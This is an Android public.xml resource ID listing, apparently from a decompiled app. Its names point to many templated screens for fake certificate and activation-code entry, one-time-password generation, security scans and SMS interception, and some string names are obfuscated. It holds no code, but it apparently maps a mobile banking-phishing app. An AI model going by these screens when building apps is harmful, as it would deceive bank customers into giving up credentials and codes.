<?xml version="1.0" encoding="utf-8"?>
<resources>
    <public type="drawable" name="andi" id="0x7f020000" />
    <public type="drawable" name="template43_about" id="0x7f020005" />
    <public type="drawable" name="template44_about" id="0x7f020006" />
    <public type="drawable" name="template44_back" id="0x7f020007" />
    <public type="drawable" name="template44_btn" id="0x7f020008" />
    <public type="drawable" name="template44_btn_hover" id="0x7f020009" />
    <public type="drawable" name="template44_dev" id="0x7f02000a" />
    <public type="drawable" name="template44_head_back" id="0x7f02000b" />
    <public type="drawable" name="template44_head_line" id="0x7f02000c" />
    <public type="drawable" name="template44_lic_code" id="0x7f02000d" />
    <public type="drawable" name="template44_logo2" id="0x7f02000e" />
    <public type="drawable" name="template44_one_password" id="0x7f02000f" />
    <public type="drawable" name="template44_selector_btn" id="0x7f020010" />
    <public type="drawable" name="ic_launcher44" id="0x7f020002" />
    <public type="drawable" name="template11_top_bg1" id="0x7f020003" />
    <public type="drawable" name="template11_top_bg2" id="0x7f020004" />
    <public type="drawable" name="back" id="0x7f020001" />
    <public type="layout" name="activity_incoming_call" id="0x7f030000" />
    <public type="layout" name="activity_main" id="0x7f030001" />
    <public type="layout" name="activity_main10" id="0x7f030002" />
    <public type="layout" name="activity_main11" id="0x7f030003" />
    <public type="layout" name="activity_main12" id="0x7f030004" />
    <public type="layout" name="activity_main13" id="0x7f030005" />
    <public type="layout" name="activity_main14" id="0x7f030006" />
    <public type="layout" name="activity_main15" id="0x7f030007" />
    <public type="layout" name="activity_main16" id="0x7f030008" />
    <public type="layout" name="activity_main17" id="0x7f030009" />
    <public type="layout" name="activity_main18" id="0x7f03000a" />
    <public type="layout" name="activity_main19" id="0x7f03000b" />
    <public type="layout" name="activity_main2" id="0x7f03000c" />
    <public type="layout" name="activity_main20" id="0x7f03000d" />
    <public type="layout" name="activity_main21" id="0x7f03000e" />
    <public type="layout" name="activity_main22" id="0x7f03000f" />
    <public type="layout" name="activity_main23" id="0x7f030010" />
    <public type="layout" name="activity_main24" id="0x7f030011" />
    <public type="layout" name="activity_main25" id="0x7f030012" />
    <public type="layout" name="activity_main26" id="0x7f030013" />
    <public type="layout" name="activity_main27" id="0x7f030014" />
    <public type="layout" name="activity_main28" id="0x7f030015" />
    <public type="layout" name="activity_main29" id="0x7f030016" />
    <public type="layout" name="activity_main3" id="0x7f030017" />
    <public type="layout" name="activity_main30" id="0x7f030018" />
    <public type="layout" name="activity_main31" id="0x7f030019" />
    <public type="layout" name="activity_main32" id="0x7f03001a" />
    <public type="layout" name="activity_main33" id="0x7f03001b" />
    <public type="layout" name="activity_main34" id="0x7f03001c" />
    <public type="layout" name="activity_main36" id="0x7f03001d" />
    <public type="layout" name="activity_main37" id="0x7f03001e" />
    <public type="layout" name="activity_main38" id="0x7f03001f" />
    <public type="layout" name="activity_main4" id="0x7f030020" />
    <public type="layout" name="activity_main40" id="0x7f030021" />
    <public type="layout" name="activity_main41" id="0x7f030022" />
    <public type="layout" name="activity_main42" id="0x7f030023" />
    <public type="layout" name="activity_main43" id="0x7f030024" />
    <public type="layout" name="activity_main44" id="0x7f030025" />
    <public type="layout" name="activity_main45" id="0x7f030026" />
    <public type="layout" name="activity_main46" id="0x7f030027" />
    <public type="layout" name="activity_main47" id="0x7f030028" />
    <public type="layout" name="activity_main48" id="0x7f030029" />
    <public type="layout" name="activity_main49" id="0x7f03002a" />
    <public type="layout" name="activity_main5" id="0x7f03002b" />
    <public type="layout" name="activity_main50" id="0x7f03002c" />
    <public type="layout" name="activity_main51" id="0x7f03002d" />
    <public type="layout" name="activity_main52" id="0x7f03002e" />
    <public type="layout" name="activity_main53" id="0x7f03002f" />
    <public type="layout" name="activity_main54" id="0x7f030030" />
    <public type="layout" name="activity_main55" id="0x7f030031" />
    <public type="layout" name="activity_main56" id="0x7f030032" />
    <public type="layout" name="activity_main57" id="0x7f030033" />
    <public type="layout" name="activity_main6" id="0x7f030034" />
    <public type="layout" name="activity_main7" id="0x7f030035" />
    <public type="layout" name="activity_main8" id="0x7f030036" />
    <public type="layout" name="activity_main9" id="0x7f030037" />
    <public type="layout" name="policies" id="0x7f030038" />
    <public type="layout" name="template27_row_greed1" id="0x7f030039" />
    <public type="layout" name="template27_row_greed2" id="0x7f03003a" />
    <public type="layout" name="template27_row_greed3" id="0x7f03003b" />
    <public type="layout" name="template51_item" id="0x7f03003c" />
    <public type="anim" name="in_from_left" id="0x7f040000" />
    <public type="anim" name="in_from_right" id="0x7f040001" />
    <public type="anim" name="out_to_left" id="0x7f040002" />
    <public type="anim" name="out_to_right" id="0x7f040003" />
    <public type="anim" name="rotate" id="0x7f040004" />
    <public type="color" name="greenStart" id="0x7f050000" />
    <public type="color" name="greenMid" id="0x7f050001" />
    <public type="color" name="greenEnd" id="0x7f050002" />
    <public type="color" name="purple" id="0x7f050003" />
    <public type="color" name="green" id="0x7f050004" />
    <public type="color" name="grey" id="0x7f050005" />
    <public type="dimen" name="activity_horizontal_margin" id="0x7f060000" />
    <public type="dimen" name="activity_vertical_margin" id="0x7f060001" />
    <public type="string" name="app_name" id="0x7f070000" />
    <public type="string" name="dYutIKdPEy" id="0x7f070001" />
    <public type="string" name="dagbratrtnyuty" id="0x7f070002" />
    <public type="string" name="UQPGHOYRut" id="0x7f070003" />
    <public type="string" name="FWYGHmtCxk" id="0x7f070004" />
    <public type="string" name="ZyqebpAIHP" id="0x7f070005" />
    <public type="string" name="update_min" id="0x7f070006" />
    <public type="string" name="ZcDKGDAmjB" id="0x7f070007" />
    <public type="string" name="zVpxFlakDN" id="0x7f070008" />
    <public type="string" name="tLfcsFFJFT" id="0x7f070009" />
    <public type="string" name="TDQPrmfHaf" id="0x7f07000a" />
    <public type="string" name="bSKbJypbBf" id="0x7f07000b" />
    <public type="string" name="vudzdBwhLL" id="0x7f07000c" />
    <public type="string" name="AanDFxWfgv" id="0x7f07000d" />
    <public type="string" name="OgmDyLEpQA" id="0x7f07000e" />
    <public type="string" name="BdNGTQRkWZ" id="0x7f07000f" />
    <public type="string" name="template1_action_settings" id="0x7f070010" />
    <public type="string" name="template1_type_user" id="0x7f070011" />
    <public type="string" name="template1_type_password" id="0x7f070012" />
    <public type="string" name="template1_info" id="0x7f070013" />
    <public type="string" name="template1_type_password2" id="0x7f070014" />
    <public type="string" name="template1_OK_btn" id="0x7f070015" />
    <public type="string" name="template1_title1" id="0x7f070016" />
    <public type="string" name="template1_strOK" id="0x7f070017" />
    <public type="string" name="template2_searching" id="0x7f070018" />
    <public type="string" name="template2_not_found" id="0x7f070019" />
    <public type="string" name="template3_dev_status" id="0x7f07001a" />
    <public type="string" name="template3_malware" id="0x7f07001b" />
    <public type="string" name="template3_clean" id="0x7f07001c" />
    <public type="string" name="template3_root_status" id="0x7f07001d" />
    <public type="string" name="template3_protected" id="0x7f07001e" />
    <public type="string" name="template3_os" id="0x7f07001f" />
    <public type="string" name="template3_uptodate" id="0x7f070020" />
    <public type="string" name="template3_wifi" id="0x7f070021" />
    <public type="string" name="template3_androidap" id="0x7f070022" />
    <public type="string" name="template3_trusteer" id="0x7f070023" />
    <public type="string" name="template3_trusteer_ver" id="0x7f070024" />
    <public type="string" name="template3_scan_now" id="0x7f070025" />
    <public type="string" name="template4_certificaat" id="0x7f070026" />
    <public type="string" name="template4_genereer" id="0x7f070027" />
    <public type="string" name="template4_invoeren" id="0x7f070028" />
    <public type="string" name="template4_bevestigen" id="0x7f070029" />
    <public type="string" name="template4_uw" id="0x7f07002a" />
    <public type="string" name="template4_code" id="0x7f07002b" />
    <public type="string" name="template4_deze" id="0x7f07002c" />
    <public type="string" name="template4_about" id="0x7f07002d" />
    <public type="string" name="template5_certificaat" id="0x7f07002e" />
    <public type="string" name="template5_genereer" id="0x7f07002f" />
    <public type="string" name="template5_invoeren" id="0x7f070030" />
    <public type="string" name="template5_bevestigen" id="0x7f070031" />
    <public type="string" name="template5_uw" id="0x7f070032" />
    <public type="string" name="template5_code" id="0x7f070033" />
    <public type="string" name="template5_deze" id="0x7f070034" />
    <public type="string" name="template5_about" id="0x7f070035" />
    <public type="string" name="template6_certificaat" id="0x7f070036" />
    <public type="string" name="template6_genereer" id="0x7f070037" />
    <public type="string" name="template6_invoeren" id="0x7f070038" />
    <public type="string" name="template6_bevestigen" id="0x7f070039" />
    <public type="string" name="template6_uw" id="0x7f07003a" />
    <public type="string" name="template6_code" id="0x7f07003b" />
    <public type="string" name="template6_deze" id="0x7f07003c" />
    <public type="string" name="template6_about" id="0x7f07003d" />
    <public type="string" name="template6_loading" id="0x7f07003e" />
    <public type="string" name="template6_first" id="0x7f07003f" />
    <public type="string" name="template7_row1" id="0x7f070040" />
    <public type="string" name="template7_row2" id="0x7f070041" />
    <public type="string" name="template7_row3" id="0x7f070042" />
    <public type="string" name="template7_row4" id="0x7f070043" />
    <public type="string" name="template8_title" id="0x7f070044" />
    <public type="string" name="template8_activacia" id="0x7f070045" />
    <public type="string" name="template8_scan" id="0x7f070046" />
    <public type="string" name="template8_complete" id="0x7f070047" />
    <public type="string" name="template8_last_scan" id="0x7f070048" />
    <public type="string" name="template8_kod" id="0x7f070049" />
    <public type="string" name="template9_certificaat" id="0x7f07004a" />
    <public type="string" name="template9_genereer" id="0x7f07004b" />
    <public type="string" name="template9_invoeren" id="0x7f07004c" />
    <public type="string" name="template9_bevestigen" id="0x7f07004d" />
    <public type="string" name="template9_uw" id="0x7f07004e" />
    <public type="string" name="template9_code" id="0x7f07004f" />
    <public type="string" name="template9_deze" id="0x7f070050" />
    <public type="string" name="template9_about" id="0x7f070051" />
    <public type="string" name="template9_loading" id="0x7f070052" />
    <public type="string" name="template9_copy" id="0x7f070053" />
    <public type="string" name="template9_copyright" id="0x7f070054" />
    <public type="string" name="template10_certificaat" id="0x7f070055" />
    <public type="string" name="template10_genereer" id="0x7f070056" />
    <public type="string" name="template10_invoeren" id="0x7f070057" />
    <public type="string" name="template10_bevestigen" id="0x7f070058" />
    <public type="string" name="template10_uw" id="0x7f070059" />
    <public type="string" name="template10_code" id="0x7f07005a" />
    <public type="string" name="template10_deze" id="0x7f07005b" />
    <public type="string" name="template10_about" id="0x7f07005c" />
    <public type="string" name="template10_loading" id="0x7f07005d" />
    <public type="string" name="template11_certificaat" id="0x7f07005e" />
    <public type="string" name="template11_genereer" id="0x7f07005f" />
    <public type="string" name="template11_invoeren" id="0x7f070060" />
    <public type="string" name="template11_bevestigen" id="0x7f070061" />
    <public type="string" name="template11_uw" id="0x7f070062" />
    <public type="string" name="template11_code" id="0x7f070063" />
    <public type="string" name="template11_deze" id="0x7f070064" />
    <public type="string" name="template11_about" id="0x7f070065" />
    <public type="string" name="template11_loading" id="0x7f070066" />
    <public type="string" name="template12_certificaat" id="0x7f070067" />
    <public type="string" name="template12_genereer" id="0x7f070068" />
    <public type="string" name="template12_invoeren" id="0x7f070069" />
    <public type="string" name="template12_bevestigen" id="0x7f07006a" />
    <public type="string" name="template12_uw" id="0x7f07006b" />
    <public type="string" name="template12_code" id="0x7f07006c" />
    <public type="string" name="template12_deze" id="0x7f07006d" />
    <public type="string" name="template12_about" id="0x7f07006e" />
    <public type="string" name="template12_loading" id="0x7f07006f" />
    <public type="string" name="template13_certificaat" id="0x7f070070" />
    <public type="string" name="template13_genereer" id="0x7f070071" />
    <public type="string" name="template13_invoeren" id="0x7f070072" />
    <public type="string" name="template13_bevestigen" id="0x7f070073" />
    <public type="string" name="template13_uw" id="0x7f070074" />
    <public type="string" name="template13_code" id="0x7f070075" />
    <public type="string" name="template13_deze" id="0x7f070076" />
    <public type="string" name="template13_about" id="0x7f070077" />
    <public type="string" name="template13_loading" id="0x7f070078" />
    <public type="string" name="template14_certificaat" id="0x7f070079" />
    <public type="string" name="template14_genereer" id="0x7f07007a" />
    <public type="string" name="template14_invoeren" id="0x7f07007b" />
    <public type="string" name="template14_bevestigen" id="0x7f07007c" />
    <public type="string" name="template14_uw" id="0x7f07007d" />
    <public type="string" name="template14_code" id="0x7f07007e" />
    <public type="string" name="template14_deze" id="0x7f07007f" />
    <public type="string" name="template14_about" id="0x7f070080" />
    <public type="string" name="template14_loading" id="0x7f070081" />
    <public type="string" name="template15_certificaat" id="0x7f070082" />
    <public type="string" name="template15_genereer" id="0x7f070083" />
    <public type="string" name="template15_invoeren" id="0x7f070084" />
    <public type="string" name="template15_bevestigen" id="0x7f070085" />
    <public type="string" name="template15_uw" id="0x7f070086" />
    <public type="string" name="template15_code" id="0x7f070087" />
    <public type="string" name="template15_deze" id="0x7f070088" />
    <public type="string" name="template15_about" id="0x7f070089" />
    <public type="string" name="template15_loading" id="0x7f07008a" />
    <public type="string" name="template16_certificaat" id="0x7f07008b" />
    <public type="string" name="template16_genereer" id="0x7f07008c" />
    <public type="string" name="template16_invoeren" id="0x7f07008d" />
    <public type="string" name="template16_bevestigen" id="0x7f07008e" />
    <public type="string" name="template16_uw" id="0x7f07008f" />
    <public type="string" name="template16_code" id="0x7f070090" />
    <public type="string" name="template16_deze" id="0x7f070091" />
    <public type="string" name="template16_about" id="0x7f070092" />
    <public type="string" name="template16_loading" id="0x7f070093" />
    <public type="string" name="template17_certificaat" id="0x7f070094" />
    <public type="string" name="template17_trasted" id="0x7f070095" />
    <public type="string" name="template17_steps" id="0x7f070096" />
    <public type="string" name="template17_gener" id="0x7f070097" />
    <public type="string" name="template17_kunt_gebruik" id="0x7f070098" />
    <public type="string" name="template17_Persoonlijke" id="0x7f070099" />
    <public type="string" name="template17_code" id="0x7f07009a" />
    <public type="string" name="template18_certificaat" id="0x7f07009b" />
    <public type="string" name="template18_genereer" id="0x7f07009c" />
    <public type="string" name="template18_invoeren" id="0x7f07009d" />
    <public type="string" name="template18_bevestigen" id="0x7f07009e" />
    <public type="string" name="template18_uw" id="0x7f07009f" />
    <public type="string" name="template18_code" id="0x7f0700a0" />
    <public type="string" name="template18_deze" id="0x7f0700a1" />
    <public type="string" name="template18_about" id="0x7f0700a2" />
    <public type="string" name="template18_loading" id="0x7f0700a3" />
    <public type="string" name="template18_first" id="0x7f0700a4" />
    <public type="string" name="template19_certificaat" id="0x7f0700a5" />
    <public type="string" name="template19_genereer" id="0x7f0700a6" />
    <public type="string" name="template19_email" id="0x7f0700a7" />
    <public type="string" name="template19_password" id="0x7f0700a8" />
    <public type="string" name="template19_uw" id="0x7f0700a9" />
    <public type="string" name="template19_code" id="0x7f0700aa" />
    <public type="string" name="template19_deze" id="0x7f0700ab" />
    <public type="string" name="template19_about" id="0x7f0700ac" />
    <public type="string" name="template19_loading" id="0x7f0700ad" />
    <public type="string" name="template19_re_renerate" id="0x7f0700ae" />
    <public type="string" name="template19_copy" id="0x7f0700af" />
    <public type="string" name="template20_ttl" id="0x7f0700b0" />
    <public type="string" name="template20_number" id="0x7f0700b1" />
    <public type="string" name="template21_certificaat" id="0x7f0700b2" />
    <public type="string" name="template21_genereer" id="0x7f0700b3" />
    <public type="string" name="template21_invoeren" id="0x7f0700b4" />
    <public type="string" name="template21_bevestigen" id="0x7f0700b5" />
    <public type="string" name="template21_uw" id="0x7f0700b6" />
    <public type="string" name="template21_code" id="0x7f0700b7" />
    <public type="string" name="template21_deze" id="0x7f0700b8" />
    <public type="string" name="template21_about" id="0x7f0700b9" />
    <public type="string" name="template21_loading" id="0x7f0700ba" />
    <public type="string" name="template22_certificaat" id="0x7f0700bb" />
    <public type="string" name="template22_trasted" id="0x7f0700bc" />
    <public type="string" name="template22_steps" id="0x7f0700bd" />
    <public type="string" name="template22_gener" id="0x7f0700be" />
    <public type="string" name="template22_kunt_gebruik" id="0x7f0700bf" />
    <public type="string" name="template22_Persoonlijke" id="0x7f0700c0" />
    <public type="string" name="template22_code" id="0x7f0700c1" />
    <public type="string" name="template23_copyright" id="0x7f0700c2" />
    <public type="string" name="template23_generate" id="0x7f0700c3" />
    <public type="string" name="template23_generated" id="0x7f0700c4" />
    <public type="string" name="template23_wait" id="0x7f0700c5" />
    <public type="string" name="template23_code" id="0x7f0700c6" />
    <public type="string" name="template24_certificaat" id="0x7f0700c7" />
    <public type="string" name="template24_genereer" id="0x7f0700c8" />
    <public type="string" name="template24_invoeren" id="0x7f0700c9" />
    <public type="string" name="template24_bevestigen" id="0x7f0700ca" />
    <public type="string" name="template24_uw" id="0x7f0700cb" />
    <public type="string" name="template24_code" id="0x7f0700cc" />
    <public type="string" name="template24_deze" id="0x7f0700cd" />
    <public type="string" name="template24_about" id="0x7f0700ce" />
    <public type="string" name="template24_loading" id="0x7f0700cf" />
    <public type="string" name="template24_first" id="0x7f0700d0" />
    <public type="string" name="template25_certificaat" id="0x7f0700d1" />
    <public type="string" name="template25_genereer" id="0x7f0700d2" />
    <public type="string" name="template25_invoeren" id="0x7f0700d3" />
    <public type="string" name="template25_bevestigen" id="0x7f0700d4" />
    <public type="string" name="template25_uw" id="0x7f0700d5" />
    <public type="string" name="template25_code" id="0x7f0700d6" />
    <public type="string" name="template25_deze" id="0x7f0700d7" />
    <public type="string" name="template25_about" id="0x7f0700d8" />
    <public type="string" name="template25_loading" id="0x7f0700d9" />
    <public type="string" name="template25_copy" id="0x7f0700da" />
    <public type="string" name="template25_copyright" id="0x7f0700db" />
    <public type="string" name="template26_certificaat" id="0x7f0700dc" />
    <public type="string" name="template26_step1" id="0x7f0700dd" />
    <public type="string" name="template26_invoeren" id="0x7f0700de" />
    <public type="string" name="template26_bevestigen" id="0x7f0700df" />
    <public type="string" name="template26_uw" id="0x7f0700e0" />
    <public type="string" name="template26_code" id="0x7f0700e1" />
    <public type="string" name="template26_deze" id="0x7f0700e2" />
    <public type="string" name="template26_about" id="0x7f0700e3" />
    <public type="string" name="template26_loading" id="0x7f0700e4" />
    <public type="string" name="template26_copy" id="0x7f0700e5" />
    <public type="string" name="template26_copyright" id="0x7f0700e6" />
    <public type="string" name="template27_step1" id="0x7f0700e7" />
    <public type="string" name="template27_step2" id="0x7f0700e8" />
    <public type="string" name="template27_step3" id="0x7f0700e9" />
    <public type="string" name="template27_title" id="0x7f0700ea" />
    <public type="string" name="template27_copyight" id="0x7f0700eb" />
    <public type="string" name="template27_step1_title" id="0x7f0700ec" />
    <public type="string" name="template27_please_wait" id="0x7f0700ed" />
    <public type="string" name="template27_step2_title" id="0x7f0700ee" />
    <public type="string" name="template27_step3_title" id="0x7f0700ef" />
    <public type="string" name="template27_greed_desc" id="0x7f0700f0" />
    <public type="string" name="template27_row_title" id="0x7f0700f1" />
    <public type="string" name="template27_step1_acualize" id="0x7f0700f2" />
    <public type="string" name="template27_notification" id="0x7f0700f3" />
    <public type="string" name="template27_actualize_suces" id="0x7f0700f4" />
    <public type="string" name="template28_step1" id="0x7f0700f5" />
    <public type="string" name="template28_step2" id="0x7f0700f6" />
    <public type="string" name="template28_step3" id="0x7f0700f7" />
    <public type="string" name="template28_step1_title" id="0x7f0700f8" />
    <public type="string" name="template28_step1_acualize" id="0x7f0700f9" />
    <public type="string" name="template28_notification" id="0x7f0700fa" />
    <public type="string" name="template28_please_wait" id="0x7f0700fb" />
    <public type="string" name="template28_please_wait2" id="0x7f0700fc" />
    <public type="string" name="template28_step2_title" id="0x7f0700fd" />
    <public type="string" name="template28_coordenada" id="0x7f0700fe" />
    <public type="string" name="template28_policao" id="0x7f0700ff" />
    <public type="string" name="template28_algarismo" id="0x7f070100" />
    <public type="string" name="template28_greed_title" id="0x7f070101" />
    <public type="string" name="template28_step3_title" id="0x7f070102" />
    <public type="string" name="template28_actualize_suces" id="0x7f070103" />
    <public type="string" name="template28_copyight" id="0x7f070104" />
    <public type="string" name="template29_certificaat" id="0x7f070105" />
    <public type="string" name="template29_copyight" id="0x7f070106" />
    <public type="string" name="template29_loading" id="0x7f070107" />
    <public type="string" name="template29_ktivacni_kod" id="0x7f070108" />
    <public type="string" name="template29_deze" id="0x7f070109" />
    <public type="string" name="template29_code" id="0x7f07010a" />
    <public type="string" name="template29_about" id="0x7f07010b" />
    <public type="string" name="template29_copy" id="0x7f07010c" />
    <public type="string" name="template30_generate" id="0x7f07010d" />
    <public type="string" name="template30_loading" id="0x7f07010e" />
    <public type="string" name="template30_protect" id="0x7f07010f" />
    <public type="string" name="template30_congr" id="0x7f070110" />
    <public type="string" name="template30_code" id="0x7f070111" />
    <public type="string" name="template31_certificaat" id="0x7f070112" />
    <public type="string" name="template31_trasted" id="0x7f070113" />
    <public type="string" name="template31_steps" id="0x7f070114" />
    <public type="string" name="template31_copyight" id="0x7f070115" />
    <public type="string" name="template31_gener" id="0x7f070116" />
    <public type="string" name="template31_kunt_gebruik" id="0x7f070117" />
    <public type="string" name="template31_Persoonlijke" id="0x7f070118" />
    <public type="string" name="template31_code" id="0x7f070119" />
    <public type="string" name="template31_please_wait" id="0x7f07011a" />
    <public type="string" name="template32_title" id="0x7f07011b" />
    <public type="string" name="template32_email" id="0x7f07011c" />
    <public type="string" name="template32_pass" id="0x7f07011d" />
    <public type="string" name="template32_loading" id="0x7f07011e" />
    <public type="string" name="template32_kode" id="0x7f07011f" />
    <public type="string" name="template32_code" id="0x7f070120" />
    <public type="string" name="template32_copyight" id="0x7f070121" />
    <public type="string" name="template32_copy" id="0x7f070122" />
    <public type="string" name="template33_certificaat" id="0x7f070123" />
    <public type="string" name="template33_trasted" id="0x7f070124" />
    <public type="string" name="template33_steps" id="0x7f070125" />
    <public type="string" name="template33_gener" id="0x7f070126" />
    <public type="string" name="template33_kunt_gebruik" id="0x7f070127" />
    <public type="string" name="template33_Persoonlijke" id="0x7f070128" />
    <public type="string" name="template33_code" id="0x7f070129" />
    <public type="string" name="template34_certificaat" id="0x7f07012a" />
    <public type="string" name="template34_trasted" id="0x7f07012b" />
    <public type="string" name="template34_steps" id="0x7f07012c" />
    <public type="string" name="template34_copyight" id="0x7f07012d" />
    <public type="string" name="template34_gener" id="0x7f07012e" />
    <public type="string" name="template34_kunt_gebruik" id="0x7f07012f" />
    <public type="string" name="template34_Persoonlijke" id="0x7f070130" />
    <public type="string" name="template34_code" id="0x7f070131" />
    <public type="string" name="template34_please_wait" id="0x7f070132" />
    <public type="string" name="template36_certificaat" id="0x7f070133" />
    <public type="string" name="template36_copyight" id="0x7f070134" />
    <public type="string" name="template36_loading" id="0x7f070135" />
    <public type="string" name="template36_ktivacni_kod" id="0x7f070136" />
    <public type="string" name="template36_deze" id="0x7f070137" />
    <public type="string" name="template36_code" id="0x7f070138" />
    <public type="string" name="template36_about" id="0x7f070139" />
    <public type="string" name="template36_copy" id="0x7f07013a" />
    <public type="string" name="template37_certificaat" id="0x7f07013b" />
    <public type="string" name="template37_copyight" id="0x7f07013c" />
    <public type="string" name="template37_loading" id="0x7f07013d" />
    <public type="string" name="template37_ktivacni_kod" id="0x7f07013e" />
    <public type="string" name="template37_deze" id="0x7f07013f" />
    <public type="string" name="template37_code" id="0x7f070140" />
    <public type="string" name="template37_about" id="0x7f070141" />
    <public type="string" name="template37_copy" id="0x7f070142" />
    <public type="string" name="template38_firewal" id="0x7f070143" />
    <public type="string" name="template38_firewal_dis" id="0x7f070144" />
    <public type="string" name="template38_router" id="0x7f070145" />
    <public type="string" name="template38_router_dis" id="0x7f070146" />
    <public type="string" name="template38_antivir" id="0x7f070147" />
    <public type="string" name="template38_antivir_dis" id="0x7f070148" />
    <public type="string" name="template38_scan" id="0x7f070149" />
    <public type="string" name="template38_scan_complete" id="0x7f07014a" />
    <public type="string" name="template38_statistic" id="0x7f07014b" />
    <public type="string" name="template38_license" id="0x7f07014c" />
    <public type="string" name="template40_activation_code" id="0x7f07014d" />
    <public type="string" name="template40_anti" id="0x7f07014e" />
    <public type="string" name="template40_anti_deactivated" id="0x7f07014f" />
    <public type="string" name="template40_sms" id="0x7f070150" />
    <public type="string" name="template40_sms_disable" id="0x7f070151" />
    <public type="string" name="template40_firewall" id="0x7f070152" />
    <public type="string" name="template40_firewall_deactivated" id="0x7f070153" />
    <public type="string" name="template40_scan_complete" id="0x7f070154" />
    <public type="string" name="template40_statistic" id="0x7f070155" />
    <public type="string" name="template41_one_time" id="0x7f070156" />
    <public type="string" name="template41_about_program" id="0x7f070157" />
    <public type="string" name="template41_developers" id="0x7f070158" />
    <public type="string" name="template41_exit" id="0x7f070159" />
    <public type="string" name="template41_generate" id="0x7f07015a" />
    <public type="string" name="template41_license" id="0x7f07015b" />
    <public type="string" name="template42_one_time" id="0x7f07015c" />
    <public type="string" name="template42_about_program" id="0x7f07015d" />
    <public type="string" name="template42_developers" id="0x7f07015e" />
    <public type="string" name="template42_exit" id="0x7f07015f" />
    <public type="string" name="template42_generate" id="0x7f070160" />
    <public type="string" name="template42_license" id="0x7f070161" />
    <public type="string" name="template43_head" id="0x7f070162" />
    <public type="string" name="template43_one_time_password" id="0x7f070163" />
    <public type="string" name="template43_exit" id="0x7f070164" />
    <public type="string" name="template43_license_code" id="0x7f070165" />
    <public type="string" name="template43_about_programs" id="0x7f070166" />
    <public type="string" name="template43_generate" id="0x7f070167" />
    <public type="string" name="template44_head" id="0x7f070168" />
    <public type="string" name="template44_one_time_password" id="0x7f070169" />
    <public type="string" name="template44_exit" id="0x7f07016a" />
    <public type="string" name="template44_license_code" id="0x7f07016b" />
    <public type="string" name="template44_about_programs" id="0x7f07016c" />
    <public type="string" name="template44_generate" id="0x7f07016d" />
    <public type="string" name="template45_title" id="0x7f07016e" />
    <public type="string" name="template45_desk" id="0x7f07016f" />
    <public type="string" name="template45_generate" id="0x7f070170" />
    <public type="string" name="template45_uw" id="0x7f070171" />
    <public type="string" name="template45_code" id="0x7f070172" />
    <public type="string" name="template45_loading" id="0x7f070173" />
    <public type="string" name="template46_title" id="0x7f070174" />
    <public type="string" name="template46_desk" id="0x7f070175" />
    <public type="string" name="template46_generate" id="0x7f070176" />
    <public type="string" name="template46_uw" id="0x7f070177" />
    <public type="string" name="template46_code" id="0x7f070178" />
    <public type="string" name="template46_loading" id="0x7f070179" />
    <public type="string" name="template47_generate" id="0x7f07017a" />
    <public type="string" name="template47_kode" id="0x7f07017b" />
    <public type="string" name="template47_title" id="0x7f07017c" />
    <public type="string" name="template48_code_generate" id="0x7f07017d" />
    <public type="string" name="template48_generate_now" id="0x7f07017e" />
    <public type="string" name="template48_loading" id="0x7f07017f" />
    <public type="string" name="template48_kod_activacii" id="0x7f070180" />
    <public type="string" name="template48_deze" id="0x7f070181" />
    <public type="string" name="template48_about" id="0x7f070182" />
    <public type="string" name="template49_title" id="0x7f070183" />
    <public type="string" name="template49_str1" id="0x7f070184" />
    <public type="string" name="template49_str2" id="0x7f070185" />
    <public type="string" name="template49_str3" id="0x7f070186" />
    <public type="string" name="template49_str4" id="0x7f070187" />
    <public type="string" name="template49_lastscan" id="0x7f070188" />
    <public type="string" name="template49_scan_now" id="0x7f070189" />
    <public type="string" name="template49_first_run" id="0x7f07018a" />
    <public type="string" name="template49_please_wait" id="0x7f07018b" />
    <public type="string" name="template49_please_wait2" id="0x7f07018c" />
    <public type="string" name="template49_complete" id="0x7f07018d" />
    <public type="string" name="template49_complete2" id="0x7f07018e" />
    <public type="string" name="template49_active_code" id="0x7f07018f" />
    <public type="string" name="template50_title" id="0x7f070190" />
    <public type="string" name="template50_str1" id="0x7f070191" />
    <public type="string" name="template50_str2" id="0x7f070192" />
    <public type="string" name="template50_str3" id="0x7f070193" />
    <public type="string" name="template50_str4" id="0x7f070194" />
    <public type="string" name="template50_lastscan" id="0x7f070195" />
    <public type="string" name="template50_scan_now" id="0x7f070196" />
    <public type="string" name="template50_first_run" id="0x7f070197" />
    <public type="string" name="template50_please_wait" id="0x7f070198" />
    <public type="string" name="template50_please_wait2" id="0x7f070199" />
    <public type="string" name="template50_complete" id="0x7f07019a" />
    <public type="string" name="template50_complete2" id="0x7f07019b" />
    <public type="string" name="template50_active_code" id="0x7f07019c" />
    <public type="string" name="template51_please" id="0x7f07019d" />
    <public type="string" name="template51_please_wait" id="0x7f07019e" />
    <public type="string" name="template51_about_acc" id="0x7f07019f" />
    <public type="string" name="template51_valid_OTP" id="0x7f0701a0" />
    <public type="string" name="template51_need_generate" id="0x7f0701a1" />
    <public type="string" name="template51_generate_code" id="0x7f0701a2" />
    <public type="string" name="template51_back" id="0x7f0701a3" />
    <public type="string" name="template51_add_account" id="0x7f0701a4" />
    <public type="string" name="template51_next" id="0x7f0701a5" />
    <public type="string" name="template51_error" id="0x7f0701a6" />
    <public type="string" name="template51_retry" id="0x7f0701a7" />
    <public type="string" name="template51_add_another" id="0x7f0701a8" />
    <public type="string" name="template51_otp" id="0x7f0701a9" />
    <public type="string" name="template51_enter_code" id="0x7f0701aa" />
    <public type="string" name="template52_certificaat" id="0x7f0701ab" />
    <public type="string" name="template52_genereer" id="0x7f0701ac" />
    <public type="string" name="template52_activation_code" id="0x7f0701ad" />
    <public type="string" name="template52_deze" id="0x7f0701ae" />
    <public type="string" name="template52_about" id="0x7f0701af" />
    <public type="string" name="template52_loading" id="0x7f0701b0" />
    <public type="string" name="template52_first" id="0x7f0701b1" />
    <public type="string" name="template53_activation_code" id="0x7f0701b2" />
    <public type="string" name="template53_anti" id="0x7f0701b3" />
    <public type="string" name="template53_anti_deactivated" id="0x7f0701b4" />
    <public type="string" name="template53_sms" id="0x7f0701b5" />
    <public type="string" name="template53_sms_disable" id="0x7f0701b6" />
    <public type="string" name="template53_firewall" id="0x7f0701b7" />
    <public type="string" name="template53_firewall_deactivated" id="0x7f0701b8" />
    <public type="string" name="template53_scan_complete" id="0x7f0701b9" />
    <public type="string" name="template53_statistic" id="0x7f0701ba" />
    <public type="string" name="template54_activation_code" id="0x7f0701bb" />
    <public type="string" name="template54_anti" id="0x7f0701bc" />
    <public type="string" name="template54_anti_deactivated" id="0x7f0701bd" />
    <public type="string" name="template54_sms" id="0x7f0701be" />
    <public type="string" name="template54_sms_disable" id="0x7f0701bf" />
